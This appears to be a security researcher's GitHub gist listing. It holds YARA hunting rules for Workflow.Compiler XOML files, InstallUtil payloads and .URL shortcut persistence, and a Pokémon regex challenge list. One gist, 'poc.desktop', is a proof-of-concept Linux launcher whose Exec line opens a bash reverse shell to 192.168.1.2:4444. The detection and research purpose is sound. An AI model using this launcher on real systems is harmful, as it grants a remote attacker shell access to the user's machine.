itsreallynick
/ dailyworkflow.yar
Created
October 24, 2019 14:39
Workflow.Compiler rules from August 2018
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Background: | |
| rule Hunting_Workflow_Collection_XOML { | |
| meta: | |
| author = "Nick Carr - @itsreallynick" | |
| strings: | |
| $workflow1 = "<SequentialWorkflowActivity" nocase ascii wide | |
| $workflow2 = "Code" nocase ascii wide | |
| condition: | |
| uint16(0) != 0x5A4D and all of ($workflow*) and new_file |
itsreallynick
/ poc.desktop
Last active
October 28, 2019 03:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Desktop Entry] | |
| Name=GoShortcutItsYourEpoch | |
| Exec=/bin/bash -i >& /dev/tcp/192.168.1.2/4444 0>&1 | |
| Icon=http://bit.ly/icon-png | |
| Terminal=false | |
| Type=Application |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule Hunting_InstallUtil_ProbablePayload | |
| { | |
| meta: | |
| author = "Nick Carr - @itsreallynick" | |
| description = "2019-05-22 - Focusing on the underlying structure that largely cannot change outside of obfuscation" | |
| strings: | |
| $installutil = "System.Configuration.Install" nocase ascii wide | |
| $override_func1 = "public override string HelpText" nocase ascii wide | |
| $override_func2 = "public override void Uninstall" nocase ascii wide | |
| $override_func3 = "public override void Install" nocase ascii wide |
itsreallynick
/ gen_URLpersistence.yar
Last active
March 10, 2020 12:47
Yara rules for .url tricks that didn't fit in a tweet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule Methodology_Suspicious_Shortcut_Local_URL | |
| { | |
| meta: | |
| author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)" | |
| description = "Detects local script usage for .URL persistence" | |
| reference = "https://twitter.com/cglyer/status/1176184798248919044" | |
| strings: | |
| $file = "URL=file:///" nocase | |
| $url_clsid = "[{000214A0-0000-0000-C000-000000000046}]" | |
| $url_explicit = "[InternetShortcut]" nocase |
itsreallynick
/ poké.txt
Created
September 10, 2020 02:16
Pokémon Challenge - Regex Capture Them All!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bulbasaur | |
| Ivysaur | |
| Venusaur | |
| Charmander | |
| Charmeleon | |
| Charizard | |
| Squirtle | |
| Wartortle | |
| Blastoise | |
| Caterpie |
OlderNewer